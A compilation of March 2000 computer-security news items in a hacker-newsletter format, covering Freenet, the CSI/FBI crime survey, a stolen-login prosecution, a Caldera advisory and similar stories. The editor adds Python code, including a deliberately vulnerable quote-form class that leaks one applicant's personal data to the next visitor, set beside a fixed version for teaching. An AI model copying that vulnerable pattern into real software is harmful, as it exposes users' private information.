The system is being written in Java by about a dozen programmers internationally. They have never met nor even spoken over the phone -- all communication is by email, Clarke said. Both authors and readers can choose to be anonymous if they so wish, Clarke said. Like the Web, the network is navigated by a client, or browser. He said it will even be difficult to determine if someone is running a Freenet server and what information is being stored on it, Clarke said. Alex Fowler of the Electronic Frontier Foundation said that while he generally supports anti-censorship tools, Freenet could create as many problems as it solves. Fowler said that Freenet could be a useful tool in countries like Singapore or China that censor the Net or quash free speech. But he doesn't like the idea that you wouldn't be able to remove sensitive information -- such as someone's medical records. "There's no way to tell if a project like this will actually take off," he said. "It's certainly going to raise some questions with a whole lot of people. Not just copyright holders, but governments too." Patrick Ball, deputy director of the Science and Human Rights Program with the American Association for the Advancement for Science, said tools like anonymizers, strong cryptography, and Freenet tend not to help activists who are not already under surveillance because using them is in itself suspicious and tends to alert the authorities. "I'm for any application that protects dissidents," he said. "But there's a higher order problem that's very difficult to get around, and that's by using these tools you draw attention to yourself." Although Clarke designed Freenet to protect free speech, he thinks that the safeguards they are building in to make it difficult to track down those who distribute content could lead to its notoriety as a vehicle for copyright piracy. The system was designed to make it impossible to find out where files are physically stored. 
Information posted to the network is stored on multiple servers simultaneously, making it difficult to remove a file. In fact, Clarke said any attempt to remove information causes it to be copied to other servers on the network. The only way to remove information is to disable the entire network, which may prove difficult if it becomes popular and is running on thousands of PCs all over the globe. However, Clarke said the network cannot be guaranteed to permanently store information. Only popular files survive for any period of time. Older, unpopular files would be overwritten by more popular ones. "As a project we don't want to be labeled as hackers who distribute warez or copyrighted material," he said. "The purpose of Freenet is to promote freedom of information, but there is an inevitable consequence there that it might lead to violation of copyright law." "The potential for protecting freedom of speech is more important than protecting copyright, which is an economic tool," Clarke added. Clarke noted that Freenet can be functionally identical to Napster, the wildly popular network for sharing music online. But while the Recording Industry Association of America is currently seeking a court order to shut down Napster's central servers, it would be almost impossible to disable a Freenet network running on machines all over the world. "Because it's decentralized no one can be held responsible for it," Clarke said. "Once it's released there's no point coming after me because there's nothing I, nor anyone else, can do to shut it down." Eric Sheirer, a music technology researcher at MIT's Media Lab, said Freenet is an interesting experiment, but said it would likely be used only by a small community of pirates and "privacy nuts." "If it is adopted, it will be adopted by people who want to exchange illegal information and by people who are rabid about privacy and security, which is a relatively small universe," Sheirer said. 
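(Ed: the two Freenet pieces above describe the same handful of properties: content is fetched by key rather than by host address, answers get copied onto the machines they pass through, deleting your own copy does not remove the data, and only stuff people keep asking for survives in the bounded stores. The toy below is added here to make those properties concrete; it is not Freenet's code or its real routing, just a four-node chain I made up with a content-hash key and a least-recently-used store per node.)

```python
"""
A toy content network with the properties the Freenet description
attributes to it: data is addressed by a key derived from its content,
not by a host; requests are forwarded node to node; every node on the
return path keeps a copy; each node's store is bounded and evicts the
least recently requested entry, so popular data spreads while data
nobody asks for fades. Added illustration with a constructed four-node
chain; it is not the Freenet code or its real routing protocol.
"""
import hashlib
from collections import OrderedDict


def content_key(data: bytes) -> str:
    """Content-hash key: the same bytes always map to the same key."""
    return hashlib.sha256(data).hexdigest()


class Node:
    def __init__(self, name: str, capacity: int = 3):
        self.name = name
        self.capacity = capacity
        self.store = OrderedDict()      # key -> bytes, most recently used last
        self.neighbours = []

    def _cache(self, key: str, data: bytes) -> None:
        self.store[key] = data
        self.store.move_to_end(key)
        while len(self.store) > self.capacity:
            self.store.popitem(last=False)   # evict least recently used

    def insert(self, data: bytes) -> str:
        key = content_key(data)
        self._cache(key, data)
        return key

    def request(self, key: str, visited=None, ttl: int = 6):
        """Depth-first search through neighbours, caching on the way back."""
        visited = visited if visited is not None else set()
        visited.add(self.name)
        if key in self.store:
            self.store.move_to_end(key)      # a hit counts as recent use
            return self.store[key]
        if ttl == 0:
            return None
        for nb in self.neighbours:
            if nb.name in visited:
                continue
            data = nb.request(key, visited, ttl - 1)
            if data is not None and content_key(data) == key:   # verify first
                self._cache(key, data)       # copy lands on the return path
                return data
        return None


def build_chain(n: int = 4, capacity: int = 3) -> list:
    nodes = [Node("n%d" % i, capacity) for i in range(n)]
    for a, b in zip(nodes, nodes[1:]):
        a.neighbours.append(b)
        b.neighbours.append(a)
    return nodes


def replication_demo() -> dict:
    nodes = build_chain()
    key = nodes[-1].insert(b"popular pamphlet")       # published at one end
    nodes[0].request(key)                              # read from the other end
    holders = [n.name for n in nodes if key in n.store]
    del nodes[-1].store[key]                           # publisher removes it
    still_reachable = nodes[-1].request(key) is not None
    stale = nodes[0].insert(b"nobody asks for this")
    for i in range(4):                                 # churn plus repeated reads
        nodes[0].insert(("filler %d" % i).encode())
        nodes[0].request(key)
    return {"holders_after_read": holders,
            "still_reachable": still_reachable,
            "popular_kept": key in nodes[0].store,
            "stale_evicted": stale not in nodes[0].store}


if __name__ == "__main__":
    print(replication_demo())
```

The content-hash check before caching is the part worth copying: a node never stores a reply whose hash does not match the key it asked for, so a neighbour cannot poison the network with substituted content.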
Sheirer pointed out that the Web is trustworthy because of the content on certain domains, and he likes the convenience of tracking devices such as cookies that remember log-in names and passwords. "Many of the advantages of Freenet are disadvantages to me," he said. Nonetheless, Sheirer said the advent of Freenet and Gnapster, an open-source clone of Napster, illustrated the need for debate about copyright laws in the age of ubiquitous digital distribution channels. "There are larger questions about the implications of these technologies," Sheirer said. @HWA 76.0 HNS:Mar 24th:FEDERAL CIO NEEDED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:29 AM Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news16.html Federal CIO Needed for Web Security By Brian Krebs, Newsbytes March 24, 2000 Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, R-Utah, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Speaking at a US Chamber of Commerce meeting, "Cyber Security: The Real Y2K Challenge," Bennett said that, while it is up to company CEOs to ensure the security of their own Web sites, the federal government can and should provide a overarching structure for that effort. Bennett said the Clinton administration's Critical Infrastructure Assurance Office (CIAO) - the agency charged with coordinating the federal government's cyber security efforts - was a good start, but also highlighted a need for leadership on the issue. 
"Every company has a chief information officer, and I think eventually the government would need its own CIO, maybe even at the cabinet level position," Bennett said. "But this is not going to happen quickly." Over the past few weeks, a handful of public officials have called for a federal government CIO to coordinate the government's many efforts. Last week before the House Subcommittee on Government Management, Information, and Technology, Chariman Stephen Horn, R-Calif., pointed to the government's many security management players and asked whether there shouldn't be one entity coordinating the government's efforts. "Y2K underscored the need for a disciplined management approach to problem solving," Horn said. "That type of commitment will be equally important as we turn to the second technological challenge of the New Year - computer security." Horn then turned to the witnesses, asking, "Could the Koskinen model work here?" At today's meeting, Bennett told reporters that, regardless of the model Congress ultimately chooses, he has heard from Koskinen himself on the issue. "He told me that with regard to the Critical Infrastructure Protection program: 'You have my very best wishes, but you will do it without me,'" Bennett said. Bennet said the responsibility for protecting the confidentiality and security of corporate information rests squarely on the shoulders of company CEOs, and those who wait for the government to step in with legislative remedies will find their sites hacked and their business secrets revealed. "This is a CEO and survival issue, not something you leave to the techies," he said. "The reality is that if somebody decides they want to break into your company and steal your secrets, they can do that." 
Bennett urged CEOs in attendance to shift to the mode of urgency and cooperation that made Y2K such a non-event, and emphasized the need for lawmakers and CEOs to take a "horizontal" view of their organization and how weaknesses in their companies' systems can affect other companies on the network. "We're not thinking horizontally enough in Congress and industry," Bennett said. "Nobody's interested in stovepiping: I don't care if your company is secure or not, but I do care if you're connected to the Internet." Bennett said that, given the hectic schedule that Congress is working at this session, it was likely that few of the many proposed bills to address cyber security would pass this year. But, he said, the bills were necessary to keep the dialogue going. Reported by Newsbytes.com, http://www.newsbytes.com . 
@HWA 77.0 HNS:Mar 24th:DETERRENT SENTENCES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 1:45 AM Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. Link: SCMP http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp Wednesday, March 22, 2000 Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kinds of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500. 
The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 8:32 PM Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. Link: Security Watch http://www.securitywatch.com/scripts/news/list.asp?AID=2324 Insurance site exposes sensitive customers' data (03/23/2000) Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. The security glitch in the software SelectQuote uses would have occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. 
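(Ed: the SelectQuote bug is the classic "form state lives in one server-wide object" mistake, so here it is modelled in code. This is added by me, not SelectQuote's software, which was never published; the applicant names and answers are made up. The vulnerable class keeps the quote form in a single object and never clears it once the quote is issued, so the next visitor's blank form comes back prefilled with the last applicant's answers. The hardened class keys the form by session and throws the session's data away when the quote goes out.)

```python
"""
The SelectQuote failure modelled in a few lines. Added illustration,
not SelectQuote's software (which was never published). The vulnerable
app keeps the quote form in one server-wide object and never clears it
after issuing a quote, so the next visitor's blank form is prefilled
with the previous applicant's answers. The hardened app keys the form
by session and discards the session's data when the quote is issued.
Applicant details below are constructed.
"""
import secrets


class VulnerableQuoteApp:
    """One form object shared by every visitor: the bug."""

    def __init__(self):
        self.form = {}

    def new_session(self) -> str:
        return secrets.token_urlsafe(16)   # issued but never used to key state

    def render_form(self, session_id: str) -> dict:
        return dict(self.form)             # prefills with whatever is there

    def submit(self, session_id: str, fields: dict) -> str:
        self.form.update(fields)
        return self.issue_quote(session_id)

    def issue_quote(self, session_id: str) -> str:
        # the clear that should have happened here is missing
        return "quote issued for %s" % self.form.get("name")


class HardenedQuoteApp:
    """Form state lives per session and is consumed when the quote is issued."""

    def __init__(self):
        self.sessions = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = {}
        return sid

    def render_form(self, session_id: str) -> dict:
        return dict(self.sessions.get(session_id, {}))

    def submit(self, session_id: str, fields: dict) -> str:
        self.sessions[session_id].update(fields)
        return self.issue_quote(session_id)

    def issue_quote(self, session_id: str) -> str:
        data = self.sessions.pop(session_id)   # gone once the quote is out
        return "quote issued for %s" % data.get("name")


def leak_demo(app_cls) -> dict:
    """Alice completes a quote, then Bob opens a fresh form: what does Bob see?"""
    app = app_cls()
    alice = app.new_session()
    app.submit(alice, {"name": "Alice Example", "coverage": "250000",
                       "parent_history": "heart disease"})
    bob = app.new_session()
    return app.render_form(bob)


if __name__ == "__main__":
    print(leak_demo(VulnerableQuoteApp))   # Alice's answers, shown to Bob
    print(leak_demo(HardenedQuoteApp))     # {}
```

The same leak shows up with any request-handling model that reuses a worker between users (a persistent CGI, a shared template object, a module-level dict in a long-running process); the test is always the same one leak_demo() runs: submit as one user, then fetch the blank form as another.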
This resulted in all personal information (name, address, current coverage and parents' health histories) from the previous user being plainly exposed to the next person requesting a quote. @HWA 79.0 HNS:Mar 23rd:ALTERING WEB SITES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:32 PM A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites and defaced it. Link: The Press NZ http://www.press.co.nz/2000/12/000323x04.htm Hacker breaches security to alter Alexandra website text By Sonia Gerken A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites it manages and changed the text. Clive Wilson Computers Gore managing director Ewen Whitefield said yesterday the security breach of its domain hosting machine last month was low level, but "anyone hacking into our machines is serious." The hacker changed text on the website of an Alexandra client. Police had been notified of the breach and the company was unlikely to pursue it further. "It annoys us more than anything else. If it was a major security breach we could chase it back to the United States and Brazil," Mr Whitefield said. If anything the breach proved the company's electronic "firewalls" were pretty good, stopping the hacker from getting any further than minimal damage, he said. Website designer Ken France, of Arthurton, said the hacker probably found a "tiny little hole" to sneak in through. It was an old site, designed two years ago. The breach was annoying and nothing serious - "apart from getting a laugh at our expense," he said. There was a big rush of "hits" to the site after the first hacker got in. Within a week 200 hits more than usual were logged and three or four of those had changed some text, Mr France said. "Some even put their telephone number in. "It was like 'If you want to know how I got in here give me a call'," he said. 
The company was warned about the hacking by a phone call from someone claiming to be a website watcher in Australia. Mr France said the call came an hour after he had looked at the website and it was all right. "It's quite strange how they knew. I suspect it was bogus."

Mr Whitefield said the company received an e-mail the day after the hacking from the Brazilian Internet Society asking questions about the hacker. There was no way to verify the authenticity of the e-mail, he said.

Mr France said the company's tighter security had been effective. At times he had been unable to get into sites he designed that were managed by the company. "It's good in a way. If I can't get in, how will anyone else," he said.

@HWA

80.0 HNS:Mar 23rd:SECURITY BREACHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 5:28 PM

More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey.

Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html

9 of 10 Companies Report Computer Attacks
Survey Finds Damages Triple as Cybercrime Booms

March 22, 2000

By David Noack

SAN FRANCISCO (APBnews.com) -- More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey.

The Computer Security Institute's fifth Computer Crime and Security Survey also found that the total reported financial losses have tripled. The annual survey is conducted with the participation of the San Francisco FBI Computer Intrusion Squad and aims to increase awareness of security.

This year's survey was based on responses from 643 computer-security professionals in U.S. corporations, government agencies, financial institutions, medical institutions and universities.
Only 42 percent of those answering the survey could put a dollar figure on their financial losses -- reporting the total at $265 million. The average annual total over the last three years was $120 million.

Widespread and diverse

Patrice Rapalus, director of the Computer Security Institute, said the survey points to a disturbing trend.

"Cybercrimes and other information-security breaches are widespread and diverse," she said. "Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. ... Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly, adequate staffing and training of information-security practitioners in both the private sector and government."

The survey also found:

- 70 percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse." Other examples included theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks.

- 74 percent acknowledged financial losses due to computer breaches.

- 71 percent of respondents detected unauthorized access by insiders.

- For the third year in a row, more respondents -- 59 percent -- cited their Internet connection as a frequent point of attack than cited their internal systems -- 38 percent -- as a frequent point of attack.

Financial losses larger

The report said the financial losses in eight of 12 categories were larger than in any previous year. In addition, financial losses in four categories were higher than the combined total of the three previous years.

For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27 million. The total financial losses due to sabotage for the previous years combined totaled only $10 million.
As in previous years, the most serious financial losses occurred through theft of proprietary information, with 66 respondents reporting losses of $66 million, and financial fraud, with 53 reporting $55 million in losses.

The survey results show that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming trends found in prior surveys.

Bruce J. Gephardt heads the FBI's Northern California office in San Francisco, which covers 15 counties, including Silicon Valley. He said the survey helps him decide how to deploy his forces instead of reacting to computer crises as they occur.

Trends and crises

"The results of the CSI/FBI survey provide us with valuable data," Gephardt said. "This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level, but [it] identifies emerging crime trends and helps me decide how best to proactively and aggressively assign resources before those 'trends' become 'crises.'"

CSI, which was established in 1974, is a San Francisco-based association of information-security professionals.

The FBI, responding to an increase in the criminal targeting of major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC), which is located at FBI headquarters, and the Regional Computer Intrusion Squads, which are located in selected offices throughout the United States.

The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyberattacks on the nation's infrastructure.
The Regional Computer Intrusion Squads investigate violations of the Computer Fraud and Abuse Act, which includes intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

81.0 HNS:Mar 23rd:ATTACK COSTS RISE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ Thursday 23 March 2000 on 3:29 PM

In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach.

Link: CNNfn
http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/

Hacker attack costs rise
FBI, CSI: Verifiable losses due to poor security top $265M in 1999

March 22, 2000: 7:30 a.m. ET

SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best known sites seriously hit by hacker attacks, few computer users would question that cyber-security is a pressing concern.

In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach.

Security experts say a large number of attacks go unrecognized, and the total is hard to assess, with companies reluctant to admit they've been vandalized. But the annual survey gives a clear picture of a worsening problem.

"The trends are continuing in the same direction. It's going from bad to worse in terms of threats from the outside, while the threat from the inside doesn't go away," said Richard Power, CSI's editorial director.
The fifth annual survey of computer crime and security polled some 640 corporations, banks and government organizations about the state of their computer systems.

Only 42 percent of these respondents could put a dollar figure on what the attacks cost them -- but this figure, at $265 million, was more than double the average annual total over the last three years.

While the most common threats -- computer viruses, laptop theft, or employee "net abuse" -- continued apace, at least 74 percent of respondents reported more serious security breaches including theft of proprietary information, financial fraud, system penetration by outsiders, data or network sabotage, or "denial of service" attacks designed to take websites out of commission.

Information theft and financial fraud caused the most severe financial losses, put at $68 million and $56 million respectively.

But "denial of service" attacks, like the ones that temporarily paralyzed Yahoo!, eBay, Buy.com, and several other websites in February, are also a growing problem, Power said.

Losses traced to denial of service attacks were only $77,000 in 1998, and by 1999 had risen to just $116,250. The new survey, which reports on numbers taken before the high-profile February strikes, showed quantified losses up at more than $8.2 million.

"The denial of service showed that many sites are way, way understaffed and not adequately secured," Power said. "Maybe a half a dozen sites were attacked in that attack, and 150 sites were hacked into to launch the attack. There is a widespread insecurity among corporate sites and government sites and the problem is not just technological, it is human. There are not enough people working on it."

Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern California office, said the survey revealed how quickly computer security is becoming a major problem faced by law enforcement, and how more staff was needed to fight it.
"If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen," Gephardt said in a news release.

@HWA

82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:28 PM

A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors.

Link: Miami Herald
http://www.herald.com/content/today/business/brkdocs/079991.htm

Posted at 11:58 p.m. EST Wednesday, March 22, 2000

Man indicted after allegedly hacking into government computers

SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose.

On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday.

Butler's attorney did not return a telephone call seeking comment.
@HWA

83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Thursday 23 March 2000 on 12:19 PM

The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack.

Link: Linux Today
http://linuxtoday.com/stories/18850.html

Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms

Mar 22, 2000, 23:23 UTC

Caldera Systems, Inc. Security Advisory

Subject:          rpm_query allows everyone to list installed rpms
Advisory number:  CSSA-2000-007.1
Issue date:       2000 March, 8
Last change:      2000 March, 14
Cross reference:

1. Problem Description

   The OpenLinux package contains a CGI script called rpm_query that allows a user to obtain a list of all RPM packages installed on that machine, provided the Apache Web server is running. This could be used by an intruder to determine what part of the system to attack.

2. Vulnerable Versions

   System                   Package
   -----------------------------------------------------------
   OpenLinux Desktop 2.3    All packages previous to OpenLinux-2.3-17
   OpenLinux eServer 2.3    All packages previous to OpenLinux-2.3-24S

3. Solution

   Workaround:

   Remove the script by executing:

       rm -f /home/httpd/cgi-bin/rpm_query

   The proper solution is to upgrade to the latest packages.

4. OpenLinux Desktop 2.3

   4.1 Location of Fixed Packages

   The upgrade packages can be found on Caldera's FTP site at:

       ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS

@HWA

84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Thursday 23 March 2000 on 12:14 PM

Businesses can have their network security hosted and managed remotely using a new service from Network Associates.
The company's myCIO.com service offers an ASP 'infrastructure' which allows partners such as ISPs, telecoms providers and even computer resellers to host NAI's products and services online.

Link: VNUNET
http://www.vnunet.com/News/601120

@HWA

85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:29 AM

The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab."

Link: Wired
http://www.wired.com/news/politics/0,1283,35117,00.html

MS Fixing 'Anti-Arab' Bug

Reuters
7:00 a.m. Mar. 22, 2000 PST

PARIS -- The head of Microsoft's European and Middle East operations said on Wednesday the firm was fixing a bug in its Windows 2000 French-language spell-checker which suggested replacing "anti-stress" with the word "anti-arab."

Michel Lacombe, president of Microsoft EMEA, said the problem should be fixed in "a few weeks" and that customers would be offered a new version free of charge.

"Microsoft is very sorry about this. We are always sensitive to things which confuse people and we are very respectful of people getting hurt," Lacombe told Reuters.

"Microsoft has no problem with the Arab world, we invest in the Arab language, and in Arab countries. Our software developers are looking at a way to fix this and in a few weeks this will be behind us," he added.

France's national CFDT trade union denounced Microsoft for its "racist turn of phrase."

"As it is not able itself to go directly to court, the CFDT is informing national anti-racism societies. It will support any criminal action they should take," the CFDT said in a statement.

Lacombe noted that the bug was in its spell-checker, not its thesaurus. "That would be worse. We are not trying to give a synonym of anti-stress, just to help the user solve a spelling problem," he said.
@HWA

86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:28 AM

Microsoft posted Service Release 1 (SR-1) to the Web for download. It is the first collection of patches and fixes for Office 2000 since the product began shipping last June.

Link: Microsoft
http://officeupdate.microsoft.com/default.asp

@HWA

87.0 HNS:Mar 23rd:SHARING INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:16 AM

A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act.

Link: NewsBytes
http://www.newsbytes.com/pubNews/00/146086.html

Bill Would Protect Firms That Share Hacking Info

By David McGuire, Newsbytes

WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST

A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA).

Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today.

"The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said.

While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said.
The legislation will apply only to telecommunications and information technology infrastructure attacks.

Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, but Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said.

Reported by Newsbytes.com, http://www.newsbytes.com .

@HWA

88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 2:31 AM

A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time.

Link: GovExec article
http://www.govexec.com/dailyfed/0300/032000m1.htm

Link: US vs. Simons - court's decision
http://www.law.emory.edu/4circuit/feb2000/994238.p.html

GovExec; March 20, 2000

DAILY BRIEFING

Court upholds agency reviews of employees' Internet use

By Kellie Lunney
klunney@govexec.com

A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time.

The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits.

Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test.
The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive.

Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized."

According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html.

@HWA

89.0 HNS:Mar 23rd:CRIME FIGHTING LAB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 2:15 AM

With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy.
Link: Chicago Tribune
http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html

FIGHTING CRIME ON COMPUTER
LAB GIFTS LET COLLEGE OFFER CLASS FULL-TIME

By LeAnn Spencer
Tribune Staff Writer
March 21, 2000

With an eye toward cracking down on cyber crime, officials at the College of DuPage on Monday unveiled a new state-of-the-art computer lab at the college's Suburban Law Enforcement Academy.

